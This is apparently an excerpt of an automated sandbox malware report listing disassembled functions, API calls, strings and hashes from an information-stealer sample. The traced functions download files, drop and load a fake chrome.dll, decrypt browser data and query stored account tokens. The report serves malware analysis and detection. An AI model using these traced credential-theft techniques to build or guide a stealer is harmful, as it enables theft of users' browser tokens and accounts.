                                              • Instruction ID: 62bae03b9e4771e022f65dfe0b744ca25a6527e7e90d195df508867c32b8ef77
                                              • Opcode Fuzzy Hash: 79bb47fcace65dc0c408726790117bb2adccae202de1a5eabfd6db97336226ad
                                              • Instruction Fuzzy Hash: CD5184B1A01218ABDB20EF90DC45FEE7779AB44305F0041AEF605B71C0DB786A95CF59
                                              Function 04846357 Relevance: 13.6, APIs: 9, Instructions: 133networkfileCOMMON
                                              Download Yara Rule
                                              APIs
                                                • Part of subcall function 0485AD17: lstrcpy.KERNEL32(?,00000000), ref: 0485AD5D
                                                • Part of subcall function 04844A67: ??2@YAPAXI@Z.MSVCRT(00000800), ref: 04844AA1
                                                • Part of subcall function 04844A67: ??2@YAPAXI@Z.MSVCRT(00000800), ref: 04844AB8
                                                • Part of subcall function 04844A67: ??2@YAPAXI@Z.MSVCRT(00000800), ref: 04844ACF
                                                • Part of subcall function 04844A67: lstrlen.KERNEL32(00000000,00000000,0000003C), ref: 04844AF0
                                                • Part of subcall function 04844A67: InternetCrackUrlA.WININET(00000000,00000000), ref: 04844B00
                                              • InternetOpenA.WININET(00420DFB,00000001,00000000,00000000,00000000), ref: 048463C6
                                              • StrCmpCA.SHLWAPI(?,006D6E80), ref: 048463FE
                                              • InternetOpenUrlA.WININET(00000000,00000000,00000000,00000000,00000100,00000000), ref: 04846446
                                              • CreateFileA.KERNEL32(00000000,40000000,00000003,00000000,00000002,00000080,00000000), ref: 0484646A
                                              • InternetReadFile.WININET(?,?,00000400,?), ref: 04846493
                                              • WriteFile.KERNEL32(?,?,00000000,?,00000000), ref: 048464C1
                                              • CloseHandle.KERNEL32(?,?,00000400), ref: 04846500
                                              • InternetCloseHandle.WININET(?), ref: 0484650A
                                              • InternetCloseHandle.WININET(00000000), ref: 04846517
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.2288724291.0000000004840000.00000040.00001000.00020000.00000000.sdmp, Offset: 04840000, based on PE: false
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_4840000_lxEu3xfjIb.jbxd
                                              Yara matches
                                              Similarity
                                              • API ID: Internet$??2@CloseFileHandle$Open$CrackCreateReadWritelstrcpylstrlen
                                              • String ID:
                                              • API String ID: 4287319946-0
                                              • Opcode ID: b1da7730cf3e973672ea3d958da0836ae58ce978cfb0a793029a7ab8af6d853d
                                              • Instruction ID: 159544368e3ebe1d15f4de9c686abdde5c963ec580795fe21372ed12efd4027f
                                              • Opcode Fuzzy Hash: b1da7730cf3e973672ea3d958da0836ae58ce978cfb0a793029a7ab8af6d853d
                                              • Instruction Fuzzy Hash: EA515FB1A0021CABDF24DF94DC44BEE7779AB44305F008699E605F7190EBB8AA85CF95
                                              Function 04855227 Relevance: 12.6, APIs: 10, Instructions: 119stringCOMMON
                                              Download Yara Rule
                                              APIs
                                              • memset.MSVCRT ref: 0485523E
                                                • Part of subcall function 048591D7: SHGetFolderPathA.SHELL32(00000000,0000001C,00000000,00000000,?,?,000003E8), ref: 04859202
                                              • lstrcat.KERNEL32(?,00000000), ref: 04855267
                                              • lstrcat.KERNEL32(?,00420FE8), ref: 04855284
                                                • Part of subcall function 04854DC7: wsprintfA.USER32 ref: 04854DE3
                                                • Part of subcall function 04854DC7: FindFirstFileA.KERNEL32(?,?), ref: 04854DFA
                                              • memset.MSVCRT ref: 048552CA
                                              • lstrcat.KERNEL32(?,00000000), ref: 048552F3
                                              • lstrcat.KERNEL32(?,00421008), ref: 04855310
                                                • Part of subcall function 04854DC7: StrCmpCA.SHLWAPI(?,00420FC4), ref: 04854E28
                                                • Part of subcall function 04854DC7: StrCmpCA.SHLWAPI(?,00420FC8), ref: 04854E3E
                                                • Part of subcall function 04854DC7: FindNextFileA.KERNEL32(000000FF,?), ref: 04855034
                                                • Part of subcall function 04854DC7: FindClose.KERNEL32(000000FF), ref: 04855049
                                              • memset.MSVCRT ref: 04855356
                                              • lstrcat.KERNEL32(?,00000000), ref: 0485537F
                                              • lstrcat.KERNEL32(?,00421020), ref: 0485539C
                                                • Part of subcall function 04854DC7: wsprintfA.USER32 ref: 04854E67
                                                • Part of subcall function 04854DC7: StrCmpCA.SHLWAPI(?,004208D3), ref: 04854E7C
                                                • Part of subcall function 04854DC7: wsprintfA.USER32 ref: 04854E99
                                                • Part of subcall function 04854DC7: PathMatchSpecA.SHLWAPI(?,?), ref: 04854ED5
                                                • Part of subcall function 04854DC7: lstrcat.KERNEL32(?,006D6F24), ref: 04854F01
                                                • Part of subcall function 04854DC7: lstrcat.KERNEL32(?,00420FE0), ref: 04854F13
                                                • Part of subcall function 04854DC7: lstrcat.KERNEL32(?,?), ref: 04854F27
                                                • Part of subcall function 04854DC7: lstrcat.KERNEL32(?,00420FE4), ref: 04854F39
                                                • Part of subcall function 04854DC7: lstrcat.KERNEL32(?,?), ref: 04854F4D
                                                • Part of subcall function 04854DC7: CopyFileA.KERNEL32(?,?,00000001), ref: 04854F63
                                                • Part of subcall function 04854DC7: DeleteFileA.KERNEL32(?), ref: 04854FE8
                                              • memset.MSVCRT ref: 048553E2
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.2288724291.0000000004840000.00000040.00001000.00020000.00000000.sdmp, Offset: 04840000, based on PE: false
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_4840000_lxEu3xfjIb.jbxd
                                              Yara matches
                                              Similarity
                                              • API ID: lstrcat$Filememset$Findwsprintf$Path$CloseCopyDeleteFirstFolderMatchNextSpec
                                              • String ID:
                                              • API String ID: 4017274736-0
                                              • Opcode ID: 526dae8c9c0fde88560bc6a89523ce9510f779cd9e33a96f7e7cea5f911dcca2
                                              • Instruction ID: a2db9b180b375f8b94d7d90b40781a353e35828161d3d2e09fb9196d053ba636
                                              • Opcode Fuzzy Hash: 526dae8c9c0fde88560bc6a89523ce9510f779cd9e33a96f7e7cea5f911dcca2
                                              • Instruction Fuzzy Hash: 7D41E9B5E4032867EB54F770EC4AFDD33385B20705F804A95BA85A50D0EEF867C88B92
                                              Function 048BF595 Relevance: 12.6, APIs: 4, Strings: 3, Instructions: 303COMMONLIBRARYCODE
                                              Download Yara Rule
                                              APIs
                                              • type_info::operator==.LIBVCRUNTIME ref: 048BF6B4
                                              • ___TypeMatch.LIBVCRUNTIME ref: 048BF7C2
                                              • CatchIt.LIBVCRUNTIME ref: 048BF813
                                              • CallUnexpected.LIBVCRUNTIME ref: 048BF92F
                                              Strings
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.2288724291.0000000004840000.00000040.00001000.00020000.00000000.sdmp, Offset: 04840000, based on PE: false
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_4840000_lxEu3xfjIb.jbxd
                                              Yara matches
                                              Similarity
                                              • API ID: CallCatchMatchTypeUnexpectedtype_info::operator==
                                              • String ID: csm$csm$csm
                                              • API String ID: 2356445960-393685449
                                              • Opcode ID: 0aa7d8e53ae69f4e65a14af659269dcd6c8d533d9c3592b436de8e99f8465a7b
                                              • Instruction ID: 3c5c9e7c3c8832a199f3e9ac5685a9ecc6d7201da943fc265954935e32782a60
                                              • Opcode Fuzzy Hash: 0aa7d8e53ae69f4e65a14af659269dcd6c8d533d9c3592b436de8e99f8465a7b
                                              • Instruction Fuzzy Hash: C7B15A35900209AFDF15DFA8CC409EEB7B5AF08318B144A59EB90EB311D770EA51DBD2
                                              Function 00417350 Relevance: 12.4, APIs: 6, Strings: 1, Instructions: 136COMMON
                                              Download Yara Rule
                                              APIs
                                              • ??_U@YAPAXI@Z.MSVCRT(00064000), ref: 0041735E
                                                • Part of subcall function 0041AA50: lstrcpy.KERNEL32(00420AF3,00000000), ref: 0041AA98
                                              • OpenProcess.KERNEL32(001FFFFF,00000000,0041758D,004205C5), ref: 0041739C
                                              • memset.MSVCRT ref: 004173EA
                                              • ??_V@YAXPAX@Z.MSVCRT(?), ref: 0041753E
                                              Strings
                                              • 65 79 41 69 64 48 6C 77 49 6A 6F 67 49 6B 70 58 56 43 49 73 49 43 4A 68 62 47 63 69 4F 69 41 69 52 57 52 45 55 30 45 69 49 48 30, xrefs: 0041740C
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.2287319130.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                              • Associated: 00000000.00000002.2287319130.000000000053D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2287319130.0000000000549000.00000040.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2287319130.000000000056E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2287319130.00000000006D6000.00000040.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2287319130.00000000006E8000.00000040.00000001.01000000.00000003.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_400000_lxEu3xfjIb.jbxd
                                              Yara matches
                                              Similarity
                                              • API ID: OpenProcesslstrcpymemset
                                              • String ID: 65 79 41 69 64 48 6C 77 49 6A 6F 67 49 6B 70 58 56 43 49 73 49 43 4A 68 62 47 63 69 4F 69 41 69 52 57 52 45 55 30 45 69 49 48 30
                                              • API String ID: 224852652-4138519520
                                              • Opcode ID: 4eb0c3d19f3da17071fde292eb786f020f2e13f1e01cd1aee6cfe2f08f7ed460
                                              • Instruction ID: 233c3b8a05bec9dd0facad4523d46c30dcb6cb295cabbf2d5ddda9a1061df09f
                                              • Opcode Fuzzy Hash: 4eb0c3d19f3da17071fde292eb786f020f2e13f1e01cd1aee6cfe2f08f7ed460
                                              • Instruction Fuzzy Hash: 24515FB0D04218ABDB14EF91DC45BEEB7B5AF04305F1041AEE21567281EB786AC8CF59
                                              Function 0040BA50 Relevance: 12.3, APIs: 4, Strings: 4, Instructions: 284stringCOMMON
                                              Download Yara Rule
                                              APIs
                                                • Part of subcall function 0041AA50: lstrcpy.KERNEL32(00420AF3,00000000), ref: 0041AA98
                                                • Part of subcall function 0041ACC0: lstrlenA.KERNEL32(?,004210F8,?,00000000,00420AF3), ref: 0041ACD5
                                                • Part of subcall function 0041ACC0: lstrcpy.KERNEL32(00000000), ref: 0041AD14
                                                • Part of subcall function 0041ACC0: lstrcatA.KERNEL32(00000000,00000000), ref: 0041AD22
                                                • Part of subcall function 0041AC30: lstrcpy.KERNEL32(00000000,?), ref: 0041AC82
                                                • Part of subcall function 0041AC30: lstrcatA.KERNEL32(00000000), ref: 0041AC92
                                                • Part of subcall function 0041ABB0: lstrcpy.KERNEL32(?,00420AF3), ref: 0041AC15
                                                • Part of subcall function 0041AAB0: lstrcpy.KERNEL32(?,00000000), ref: 0041AAF6
                                                • Part of subcall function 0040A560: memcmp.MSVCRT(?,v20,00000003), ref: 0040A57D
                                              • lstrlenA.KERNEL32(00000000), ref: 0040BC6F
                                                • Part of subcall function 00418FC0: LocalAlloc.KERNEL32(00000040,-00000001), ref: 00418FE2
                                              • StrStrA.SHLWAPI(00000000,AccountId), ref: 0040BC9D
                                              • lstrlenA.KERNEL32(00000000), ref: 0040BD75
                                              • lstrlenA.KERNEL32(00000000), ref: 0040BD89
                                              Strings
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.2287319130.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                              • Associated: 00000000.00000002.2287319130.000000000053D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2287319130.0000000000549000.00000040.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2287319130.000000000056E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2287319130.00000000006D6000.00000040.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2287319130.00000000006E8000.00000040.00000001.01000000.00000003.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_400000_lxEu3xfjIb.jbxd
                                              Yara matches
                                              Similarity
                                              • API ID: lstrcpy$lstrlen$lstrcat$AllocLocalmemcmp
                                              • String ID: AccountId$AccountTokens$AccountTokens$SELECT service, encrypted_token FROM token_service
                                              • API String ID: 1440504306-1079375795
                                              • Opcode ID: 07dd89b33e34ea4361fdad8a29fbd65439c590fd4139dac0401408bfbc6ec8f6
                                              • Instruction ID: 6476b4a2e47316619015001d7be3bff7ad81932ea7eb7605c7a9cb508b765a87
                                              • Opcode Fuzzy Hash: 07dd89b33e34ea4361fdad8a29fbd65439c590fd4139dac0401408bfbc6ec8f6
                                              • Instruction Fuzzy Hash: E9B17371A111089BCB04FBA1DCA6EEE7339AF14314F40456FF50673195EF386A98CB6A
                                              Function 0040A090 Relevance: 12.3, APIs: 4, Strings: 3, Instructions: 31libraryloaderCOMMON
                                              Download Yara Rule
                                              APIs
                                              • LoadLibraryA.KERNEL32(C:\ProgramData\chrome.dll,?,004108E4), ref: 0040A098
                                              • GetProcAddress.KERNEL32(00000000,connect_to_websocket), ref: 0040A0BE
                                              • GetProcAddress.KERNEL32(00000000,free_result), ref: 0040A0D5
                                              • FreeLibrary.KERNEL32(00000000,?,004108E4), ref: 0040A0F9
                                              Strings
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.2287319130.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                              • Associated: 00000000.00000002.2287319130.000000000053D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2287319130.0000000000549000.00000040.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2287319130.000000000056E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2287319130.00000000006D6000.00000040.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2287319130.00000000006E8000.00000040.00000001.01000000.00000003.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_400000_lxEu3xfjIb.jbxd
                                              Yara matches
                                              Similarity
                                              • API ID: AddressLibraryProc$FreeLoad
                                              • String ID: C:\ProgramData\chrome.dll$connect_to_websocket$free_result
                                              • API String ID: 2256533930-1545816527
                                              • Opcode ID: 7a0dc9a98ac853a9b738e9b56338bc9d7e27e39a5dbcb03120cd0e56dd10277b
                                              • Instruction ID: 41317d004e32df3368e0b40b2df30f060e9b3f1c7a199a11b2b6647de007d5a9
                                              • Opcode Fuzzy Hash: 7a0dc9a98ac853a9b738e9b56338bc9d7e27e39a5dbcb03120cd0e56dd10277b
                                              • Instruction Fuzzy Hash: 57F01DB4E0E324EFD7009B60ED48B563BA6E318341F506437F505AB2E0E3B85494CB6B
                                              Function 00416A10 Relevance: 12.3, APIs: 6, Strings: 1, Instructions: 27COMMON
                                              Download Yara Rule
                                              APIs
                                              Strings
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.2287319130.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                              • Associated: 00000000.00000002.2287319130.000000000053D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2287319130.0000000000549000.00000040.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2287319130.000000000056E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2287319130.00000000006D6000.00000040.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2287319130.00000000006E8000.00000040.00000001.01000000.00000003.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_400000_lxEu3xfjIb.jbxd
                                              Yara matches
                                              Similarity
                                              • API ID: ExitProcess$DefaultLangUser
                                              • String ID: *
                                              • API String ID: 1494266314-163128923
                                              • Opcode ID: 8ad7487ebdf551ce844e744865076748c7b192adeb82af89cb9554ed9750e1ed
                                              • Instruction ID: 485b87df60e927c5081145715141aeea1c9fd48c6e3f29f258bd7afdae13bdb0
                                              • Opcode Fuzzy Hash: 8ad7487ebdf551ce844e744865076748c7b192adeb82af89cb9554ed9750e1ed
                                              • Instruction Fuzzy Hash: AFF0E232D8E218EFD3409FE0EC0979CFB31EB05707F064296F60996190E6708A80CB52
                                              Function 04847897 Relevance: 12.1, APIs: 8, Instructions: 91stringCOMMON
                                              Download Yara Rule
                                              APIs
                                                • Part of subcall function 04847597: RegOpenKeyExA.ADVAPI32(80000001,?,00000000,00020019,?), ref: 04847601
                                                • Part of subcall function 04847597: RegEnumValueA.ADVAPI32(?,00000000,00000000,000000FF,00000000,00000003,?,?), ref: 04847678
                                                • Part of subcall function 04847597: StrStrA.SHLWAPI(00000000,0042191C,00000000), ref: 048476D4
                                                • Part of subcall function 04847597: GetProcessHeap.KERNEL32(00000000,?), ref: 04847719
                                                • Part of subcall function 04847597: HeapFree.KERNEL32(00000000), ref: 04847720
                                              • lstrcat.KERNEL32(006D7068,0042192C), ref: 048478CD
                                              • lstrcat.KERNEL32(006D7068,00000000), ref: 0484790F
                                              • lstrcat.KERNEL32(006D7068,00421930), ref: 04847921
                                              • lstrcat.KERNEL32(006D7068,00000000), ref: 04847956
                                              • lstrcat.KERNEL32(006D7068,00421934), ref: 04847967
                                              • lstrcat.KERNEL32(006D7068,00000000), ref: 0484799A
                                              • lstrcat.KERNEL32(006D7068,00421938), ref: 048479B4
                                              • task.LIBCPMTD ref: 048479C2
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.2288724291.0000000004840000.00000040.00001000.00020000.00000000.sdmp, Offset: 04840000, based on PE: false
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_4840000_lxEu3xfjIb.jbxd
                                              Yara matches
                                              Similarity
                                              • API ID: lstrcat$Heap$EnumFreeOpenProcessValuetask
                                              • String ID:
                                              • API String ID: 2677904052-0
                                              • Opcode ID: 754e135dd435b5109bd89d6f633deaab1f2fe0ec03a021116c7625d90a29a748
                                              • Instruction ID: 7f4b196eca927b8791903901c8950e07b87d33f989511adc61c8fd46183a019c
                                              • Opcode Fuzzy Hash: 754e135dd435b5109bd89d6f633deaab1f2fe0ec03a021116c7625d90a29a748
                                              • Instruction Fuzzy Hash: B03162B1E04118DFDB04EBE4DC94DFE7776AB94305F105619E102E72A0EB74BA85CBA2
                                              Function 04845267 Relevance: 12.1, APIs: 8, Instructions: 82networkmemoryfileCOMMON
                                              Download Yara Rule
                                              APIs
                                              • GetProcessHeap.KERNEL32(00000000,05F5E0FF), ref: 04845281
                                              • RtlAllocateHeap.NTDLL(00000000), ref: 04845288
                                              • InternetOpenA.WININET(00420DE3,00000000,00000000,00000000,00000000), ref: 048452A1
                                              • InternetOpenUrlA.WININET(?,00000000,00000000,00000000,04000100,00000000), ref: 048452C8
                                              • InternetReadFile.WININET(?,?,00000400,00000000), ref: 048452F8
                                              • memcpy.MSVCRT(00000000,?,00000001), ref: 04845341
                                              • InternetCloseHandle.WININET(?), ref: 04845370
                                              • InternetCloseHandle.WININET(?), ref: 0484537D
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.2288724291.0000000004840000.00000040.00001000.00020000.00000000.sdmp, Offset: 04840000, based on PE: false
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_4840000_lxEu3xfjIb.jbxd
                                              Yara matches
                                              Similarity
                                              • API ID: Internet$CloseHandleHeapOpen$AllocateFileProcessReadmemcpy
                                              • String ID:
                                              • API String ID: 1008454911-0
                                              • Opcode ID: 9d9a8564c17c37c6ab9290f4ff10c49815d7cff8932d35ae010a82ac5e0e1cea
                                              • Instruction ID: df31909730d173c7ae592bf29da5e395b12f569adcc4de071f4a8cf0a82489e0
                                              • Opcode Fuzzy Hash: 9d9a8564c17c37c6ab9290f4ff10c49815d7cff8932d35ae010a82ac5e0e1cea
                                              • Instruction Fuzzy Hash: 8C31F8B4A4421CABDB24CF54DC85BDCB7B5AB48304F5086D9FB09A7280D7B06AC58F59
                                              Function 048559C7 Relevance: 10.9, APIs: 7, Instructions: 383sleepCOMMON
                                              Download Yara Rule
                                              APIs
                                                • Part of subcall function 0485AD97: lstrlen.KERNEL32(048451BC,?,?,048451BC,00420DDF), ref: 0485ADA2
                                                • Part of subcall function 0485AD97: lstrcpy.KERNEL32(00420DDF,00000000), ref: 0485ADFC
                                                • Part of subcall function 0485ACB7: lstrcpy.KERNEL32(00420E1A,00000000), ref: 0485ACFF
                                              • StrCmpCA.SHLWAPI(00000000,004210B0,00000000), ref: 04855AFB
                                              • StrCmpCA.SHLWAPI(00000000,004210B8), ref: 04855B58
                                              • StrCmpCA.SHLWAPI(00000000,004210C8), ref: 04855D0E
                                                • Part of subcall function 0485AD17: lstrcpy.KERNEL32(?,00000000), ref: 0485AD5D
                                                • Part of subcall function 048556A7: StrCmpCA.SHLWAPI(00000000,00421074), ref: 048556DF
                                                • Part of subcall function 0485AE17: lstrcpy.KERNEL32(?,00420E1A), ref: 0485AE7C
                                                • Part of subcall function 04855777: StrCmpCA.SHLWAPI(00000000,00421084,00000000), ref: 048557CF
                                                • Part of subcall function 04855777: lstrlen.KERNEL32(00000000), ref: 048557E6
                                                • Part of subcall function 04855777: StrStrA.SHLWAPI(00000000,00000000), ref: 0485581B
                                                • Part of subcall function 04855777: lstrlen.KERNEL32(00000000), ref: 0485583A
                                                • Part of subcall function 04855777: strtok.MSVCRT(00000000,?), ref: 04855855
                                                • Part of subcall function 04855777: lstrlen.KERNEL32(00000000), ref: 04855865
                                              • StrCmpCA.SHLWAPI(00000000,004210C0,00000000), ref: 04855C42
                                              • StrCmpCA.SHLWAPI(00000000,004210D0,00000000), ref: 04855DF7
                                              • StrCmpCA.SHLWAPI(00000000,004210D8), ref: 04855EC3
                                              • Sleep.KERNEL32(0000EA60), ref: 04855ED2
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.2288724291.0000000004840000.00000040.00001000.00020000.00000000.sdmp, Offset: 04840000, based on PE: false
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_4840000_lxEu3xfjIb.jbxd
                                              Yara matches
                                              Similarity
                                              • API ID: lstrcpylstrlen$Sleepstrtok
                                              • String ID:
                                              • API String ID: 3630751533-0
                                              • Opcode ID: 0eb3445eed1b3daeda1f2162748cb05894813a744caa4cc26cce728cb2d7be17
                                              • Instruction ID: f3b4d7bcc7318eff7ecc5a4129c7285ed4a16ff0ac828a56ff15be3e235a3290
                                              • Opcode Fuzzy Hash: 0eb3445eed1b3daeda1f2162748cb05894813a744caa4cc26cce728cb2d7be17
                                              • Instruction Fuzzy Hash: EFE12431900108ABDB18FBA8DC95EED7379AF54204F404B6DE846E60A4EFB57F48CB52
                                              Function 004108A0 Relevance: 10.8, APIs: 4, Strings: 2, Instructions: 255fileCOMMON
                                              Download Yara Rule
                                              APIs
                                                • Part of subcall function 0041AA50: lstrcpy.KERNEL32(00420AF3,00000000), ref: 0041AA98
                                                • Part of subcall function 00419850: CreateFileA.KERNEL32(00000000,40000000,00000000,00000000,00000002,00000080,00000000,?,004108DC,C:\ProgramData\chrome.dll), ref: 00419871
                                                • Part of subcall function 0040A090: LoadLibraryA.KERNEL32(C:\ProgramData\chrome.dll,?,004108E4), ref: 0040A098
                                              • StrCmpCA.SHLWAPI(00000000,02C9ED00), ref: 00410922
                                              • StrCmpCA.SHLWAPI(00000000,02C9EDE0), ref: 00410B79
                                              • StrCmpCA.SHLWAPI(00000000,02C9EC60), ref: 00410A0C
                                                • Part of subcall function 0041AAB0: lstrcpy.KERNEL32(?,00000000), ref: 0041AAF6
                                              • DeleteFileA.KERNEL32(C:\ProgramData\chrome.dll), ref: 00410C35
                                              Strings
                                              • C:\ProgramData\chrome.dll, xrefs: 004108CD
                                              • C:\ProgramData\chrome.dll, xrefs: 00410C30
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.2287319130.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                              • Associated: 00000000.00000002.2287319130.000000000053D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2287319130.0000000000549000.00000040.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2287319130.000000000056E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2287319130.00000000006D6000.00000040.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2287319130.00000000006E8000.00000040.00000001.01000000.00000003.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_400000_lxEu3xfjIb.jbxd
                                              Yara matches
                                              Similarity
                                              • API ID: Filelstrcpy$CreateDeleteLibraryLoad
                                              • String ID: C:\ProgramData\chrome.dll$C:\ProgramData\chrome.dll
                                              • API String ID: 585553867-663540502
                                              • Opcode ID: bc4131eb9470a0b30c78486560b6eeb5eaf7b01ec90574bc2a426dfa5c06d41b
                                              • Instruction ID: 798b8003b846a09b6b7b20e33334a9dbf0f3b1503011c00658a7b4d9c0c3a9bc
                                              • Opcode Fuzzy Hash: bc4131eb9470a0b30c78486560b6eeb5eaf7b01ec90574bc2a426dfa5c06d41b
                                              • Instruction Fuzzy Hash: DCA176717001089FCB18EF65D996FED7776AF94304F10812EE40A5F391EB349A49CB9A
                                              Function 0040A560 Relevance: 10.7, APIs: 4, Strings: 3, Instructions: 155memoryCOMMON
                                              Download Yara Rule
                                              APIs
                                              • memcmp.MSVCRT(?,v20,00000003), ref: 0040A57D
                                                • Part of subcall function 0041AA50: lstrcpy.KERNEL32(00420AF3,00000000), ref: 0041AA98
                                              • memcmp.MSVCRT(?,v10,00000003), ref: 0040A5D2
                                              • memset.MSVCRT ref: 0040A60B
                                              • LocalAlloc.KERNEL32(00000040,?), ref: 0040A664
                                              Strings
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.2287319130.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                              • Associated: 00000000.00000002.2287319130.000000000053D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2287319130.0000000000549000.00000040.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2287319130.000000000056E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2287319130.00000000006D6000.00000040.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2287319130.00000000006E8000.00000040.00000001.01000000.00000003.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_400000_lxEu3xfjIb.jbxd
                                              Yara matches
                                              Similarity
                                              • API ID: memcmp$AllocLocallstrcpymemset
                                              • String ID: @$v10$v20
                                              • API String ID: 631489823-278772428
                                              • Opcode ID: 3de6848b35251bb0137415eef7a32c473c67b893c9d08e2ffe65091eb629360f
                                              • Instruction ID: deead5598e30f73acd49a71965db0b9c26184f2a73657d717c04d8255e3e8135
                                              • Opcode Fuzzy Hash: 3de6848b35251bb0137415eef7a32c473c67b893c9d08e2ffe65091eb629360f
                                              • Instruction Fuzzy Hash: 7C518E30610208EFCB14EFA5DD95FDD7775AF40304F008029F90A6F291DB78AA55CB5A
                                              Function 04841577 Relevance: 10.6, APIs: 7, Instructions: 139stringfileCOMMON
                                              Download Yara Rule
                                              APIs
                                              • memset.MSVCRT ref: 0484158E
                                                • Part of subcall function 04841507: GetProcessHeap.KERNEL32(00000000,00000104), ref: 0484151B
                                                • Part of subcall function 04841507: RtlAllocateHeap.NTDLL(00000000), ref: 04841522
                                                • Part of subcall function 04841507: RegOpenKeyExA.ADVAPI32(000000FF,?,00000000,00020119,?), ref: 0484153E
                                                • Part of subcall function 04841507: RegQueryValueExA.ADVAPI32(?,000000FF,00000000,00000000,?,000000FF), ref: 0484155C
                                                • Part of subcall function 04841507: RegCloseKey.ADVAPI32(?), ref: 04841566
                                              • lstrcat.KERNEL32(?,00000000), ref: 048415B6
                                              • lstrlen.KERNEL32(?), ref: 048415C3
                                              • lstrcat.KERNEL32(?,00426414), ref: 048415DE
                                                • Part of subcall function 0485ACB7: lstrcpy.KERNEL32(00420E1A,00000000), ref: 0485ACFF
                                                • Part of subcall function 0485AF27: lstrlen.KERNEL32(?,006D6BF0,?,004250E4,00420E1A), ref: 0485AF3C
                                                • Part of subcall function 0485AF27: lstrcpy.KERNEL32(00000000), ref: 0485AF7B
                                                • Part of subcall function 0485AF27: lstrcat.KERNEL32(00000000,00000000), ref: 0485AF89
                                                • Part of subcall function 0485AE17: lstrcpy.KERNEL32(?,00420E1A), ref: 0485AE7C
                                                • Part of subcall function 04858F57: GetSystemTime.KERNEL32(00420E1B,006D6CA4,004205B6,?,?,04841660,?,0000001A,00420E1B,00000000,?,006D6BF0,?,004250E4,00420E1A), ref: 04858F7D
                                                • Part of subcall function 0485AE97: lstrcpy.KERNEL32(00000000,?), ref: 0485AEE9
                                                • Part of subcall function 0485AE97: lstrcat.KERNEL32(00000000), ref: 0485AEF9
                                              • CopyFileA.KERNEL32(?,00000000,00000001), ref: 048416CC
                                                • Part of subcall function 0485AD17: lstrcpy.KERNEL32(?,00000000), ref: 0485AD5D
                                                • Part of subcall function 0484A377: CreateFileA.KERNEL32(00000000,80000000,00000001,00000000,00000003,00000000,00000000), ref: 0484A3A3
                                                • Part of subcall function 0484A377: GetFileSizeEx.KERNEL32(000000FF,?), ref: 0484A3C8
                                                • Part of subcall function 0484A377: LocalAlloc.KERNEL32(00000040,?), ref: 0484A3E8
                                                • Part of subcall function 0484A377: ReadFile.KERNEL32(000000FF,?,00000000,048416F6,00000000), ref: 0484A411
